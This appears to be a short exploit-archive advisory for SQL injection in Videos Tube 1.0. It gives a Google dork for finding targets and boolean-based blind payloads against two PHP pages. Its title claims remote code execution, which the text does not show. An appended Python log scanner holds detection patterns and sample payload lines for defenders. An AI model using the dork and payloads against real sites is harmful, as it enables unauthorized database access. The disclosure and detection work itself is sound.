Videos Tube version 1.0 suffers from remote SQL injection vulnerabilities.
2a0c8fbefd4cb32a3a95c179b8a11890513347579e7c81722ade6e82bc23447f
# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.phpscriptlerim.com
# Software Link: http://demo.phpscriptlerim.com/free/videostube/
# Version: 1.0
Description
========================
The category page and the video display page are affected by two types of
SQL injection: boolean-based blind and AND/OR time-based blind. Incoming data
can be lightly filtered.
Vulnerability
========================
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with the sqlmap tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with the sqlmap tool)
--
Mustafa ALTINKAYNAK
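
For defenders running this script, the following added example (not part of the original advisory) scans web access logs for boolean-based and time-based blind probes against the `url` parameter of the two affected pages. The combined log format, the MySQL delay function names, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and parameter named in the advisory.
ENDPOINTS = ("/videocat.php", "/single.php")
PARAM = "url"
# Quote, then AND/OR and a comparison: the boolean-based blind shape.
BOOLEAN_RE = re.compile(r"""['"]\s*(?:AND|OR)\s+['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I)
# Delay functions typical of time-based blind probes (assumes a MySQL backend).
TIME_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return the kind of injection probe seen in a parameter value, or None."""
    if TIME_RE.search(value):
        return "time-based"
    if BOOLEAN_RE.search(value):
        return "boolean-based"
    return None


def scan(lines):
    """Return (line_number, path, kind) for suspicious requests to the two scripts."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith(ENDPOINTS):
            continue
        # parse_qs percent-decodes values, so encoded quotes are still matched.
        for value in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
            kind = classify(value)
            if kind:
                hits.append((number, target.path, kind))
    return hits


# Constructed sample log lines (documentation address range, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/May/2014:10:00:01 +0000] "GET /single.php?url=funny-cats HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/May/2014:10:00:02 +0000] "GET /single.php?url=test%27%20AND%203383%3D3383%20AND%20%27ODau%27%3D%27ODau HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/May/2014:10:00:03 +0000] "GET /videocat.php?url=test%27+AND+SLEEP%285%29+AND+%27a%27%3D%27a HTTP/1.1" 200 4096',
    '198.51.100.9 - - [05/May/2014:10:00:04 +0000] "GET /index.php?url=test%27%20AND%201%3D1 HTTP/1.1" 200 900',
]
```

Matches are a triage signal only; the durable fix is to bind `url` as a parameter in a prepared statement in both scripts.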